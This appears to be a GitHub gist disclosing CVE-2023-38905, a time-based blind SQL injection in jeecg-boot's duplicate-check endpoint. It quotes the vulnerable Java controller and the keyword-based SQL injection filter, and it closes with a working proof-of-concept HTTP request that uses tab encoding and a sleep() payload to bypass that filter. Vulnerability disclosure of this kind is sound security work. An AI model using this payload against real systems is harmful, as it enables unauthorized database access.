Created
August 17, 2023 13:41
-
-
Save wealeson1/e24fc8575f4e051320d69e9a75080642 to your computer and use it in GitHub Desktop.
CVE-2023-38905 Description
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Vulnerability Description: | |
| The vulnerability involves a time-based blind SQL injection flaw within the "/sys/duplicate/check" API endpoint. By utilizing the "%09" encoding to replace space characters and leveraging the sleep() function, malicious actors can exploit this vulnerability to perform time-delayed SQL injections, potentially compromising the application's database security and integrity. | |
| Tested Version(s): | |
| Versions Prior to jeecg-boot 3.5.0, Released on 2023-03-08 | |
| Acknowledgment and Fix: | |
| The jeecg-boot project authors have acknowledged the presence of this vulnerability and have taken steps to address it. The fix for this vulnerability can be found in the project's GitHub repository issue #4737: https://github.com/jeecgboot/jeecg-boot/issues/4737. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @RequestMapping(value = "/check", method = RequestMethod.GET) | |
| @ApiOperation("重复校验接口") | |
| public Result<String> doDuplicateCheck(DuplicateCheckVo duplicateCheckVo, HttpServletRequest request) { | |
| Long num = null; | |
| log.debug("----duplicate check------:"+ duplicateCheckVo.toString()); | |
| //关联表字典(举例:sys_user,realname,id) | |
| //SQL注入校验(只限制非法串改数据库) | |
| final String[] sqlInjCheck = {duplicateCheckVo.getTableName(),duplicateCheckVo.getFieldName()}; | |
| SqlInjectionUtil.filterContent(sqlInjCheck); | |
| // update-begin-author:taoyan date:20211227 for: JTC-25 【online报表】oracle 操作问题 录入弹框啥都不填直接保存 ①编码不是应该提示必填么?②报错也应该是具体文字提示,不是后台错误日志 | |
| if(StringUtils.isEmpty(duplicateCheckVo.getFieldVal())){ | |
| Result rs = new Result(); | |
| rs.setCode(500); | |
| rs.setSuccess(true); | |
| rs.setMessage("数据为空,不作处理!"); | |
| return rs; | |
| } | |
| //update-begin-author:taoyan date:20220329 for: VUEN-223【安全漏洞】当前被攻击的接口 | |
| String checkSql = duplicateCheckVo.getTableName() + SymbolConstant.COMMA + duplicateCheckVo.getFieldName() + SymbolConstant.COMMA; | |
| if(!dictQueryBlackListHandler.isPass(checkSql)){ | |
| return Result.error(dictQueryBlackListHandler.getError()); | |
| } | |
| //update-end-author:taoyan date:20220329 for: VUEN-223【安全漏洞】当前被攻击的接口 | |
| // update-end-author:taoyan date:20211227 for: JTC-25 【online报表】oracle 操作问题 录入弹框啥都不填直接保存 ①编码不是应该提示必填么?②报错也应该是具体文字提示,不是后台错误日志 | |
| if (StringUtils.isNotBlank(duplicateCheckVo.getDataId())) { | |
| // [2].编辑页面校验 | |
| num = sysDictMapper.duplicateCheckCountSql(duplicateCheckVo); | |
| } else { | |
| // [1].添加页面校验 | |
| num = sysDictMapper.duplicateCheckCountSqlNoDataId(duplicateCheckVo); | |
| } | |
| if (num == null || num == 0) { | |
| // 该值可用 | |
| return Result.ok("该值可用!"); | |
| } else { | |
| // 该值不可用 | |
| log.info("该值不可用,系统中已存在!"); | |
| return Result.error("该值不可用,系统中已存在!"); | |
| } | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public static void filterContent(String[] values, String customXssString) { | |
| String[] xssArr = XSS_STR.split("\\|"); | |
| for (String value : values) { | |
| if (value == null || "".equals(value)) { | |
| return; | |
| } | |
| // 校验sql注释 不允许有sql注释 | |
| checkSqlAnnotation(value); | |
| // 统一转为小写 | |
| value = value.toLowerCase(); | |
| //SQL注入检测存在绕过风险 https://gitee.com/jeecg/jeecg-boot/issues/I4NZGE | |
| //value = value.replaceAll("/\\*.*\\*/",""); | |
| for (int i = 0; i < xssArr.length; i++) { | |
| if (value.indexOf(xssArr[i]) > -1) { | |
| log.error("请注意,存在SQL注入关键词---> {}", xssArr[i]); | |
| log.error("请注意,值可能存在SQL注入风险!---> {}", value); | |
| throw new RuntimeException("请注意,值可能存在SQL注入风险!--->" + value); | |
| } | |
| } | |
| //update-begin-author:taoyan date:2022-7-13 for: 除了XSS_STR这些提前设置好的,还需要额外的校验比如 单引号 | |
| if (customXssString != null) { | |
| String[] xssArr2 = customXssString.split("\\|"); | |
| for (int i = 0; i < xssArr2.length; i++) { | |
| if (value.indexOf(xssArr2[i]) > -1) { | |
| log.error("请注意,存在SQL注入关键词---> {}", xssArr2[i]); | |
| log.error("请注意,值可能存在SQL注入风险!---> {}", value); | |
| throw new RuntimeException("请注意,值可能存在SQL注入风险!--->" + value); | |
| } | |
| } | |
| } | |
| //update-end-author:taoyan date:2022-7-13 for: 除了XSS_STR这些提前设置好的,还需要额外的校验比如 单引号 | |
| if(Pattern.matches(SHOW_TABLES, value) || Pattern.matches(REGULAR_EXPRE_USER, value)){ | |
| throw new RuntimeException("请注意,值可能存在SQL注入风险!--->" + value); | |
| } | |
| } | |
| return; | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Proof of Concept (PoC): | |
| GET /jeecg-boot/sys/duplicate/check?tableName=test_v3_hello&fieldName=1+and%09if(user(%20)='root@localhost',sleep(10),sleep(0))&fieldVal=1&dataId=asd HTTP/1.1 | |
| Host: 127.0.0.1:8080 | |
| Accept-Encoding: gzip, deflate | |
| Accept: */* | |
| Accept-Language: en-US;q=0.9,en;q=0.8 | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 | |
| Connection: close | |
| Cache-Control: max-age=0 | |
| X_ACCESS_TOKEN: eyJ0eXAi0iJKV1QiLCJhbGci0iJIUzI1Ni J9.eyJleHAi0jE2NzA2NjUy0TQsInVzZXJ uYW1lIjoiYWRtaW4i fQ.bL0e7k3rbFEewdMoL2YfPCo9rtzx7g9 KLjB2LK-J9SU | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment